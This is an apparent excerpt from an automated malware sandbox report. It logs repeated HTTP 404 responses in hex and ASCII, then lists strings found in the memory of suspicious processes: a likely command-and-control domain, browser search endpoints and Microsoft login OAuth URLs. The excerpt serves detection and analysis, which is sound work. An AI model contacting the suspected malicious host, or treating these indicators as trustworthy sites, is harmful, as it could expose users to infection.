72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Fri, 06 Dec 2024 16:44:04 GMT | Connection: close | Content-Length: 315 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Fri, 06 Dec 2024 16:44:06 GMT | Connection: close | Content-Length: 315 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Fri, 06 Dec 2024 16:44:09 GMT | Connection: close | Content-Length: 315 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Fri, 06 Dec 2024 16:44:11 GMT | Connection: close | Content-Length: 315 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:46:06 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:46:09 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:46:11 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:46:14 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:46:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:46:24 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:46:27 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:46:29 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3807715876.000000000569E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3807715876.000000000569E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.3807603495.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000040D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.3807603495.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000040D2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.1723346567.000000000751C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
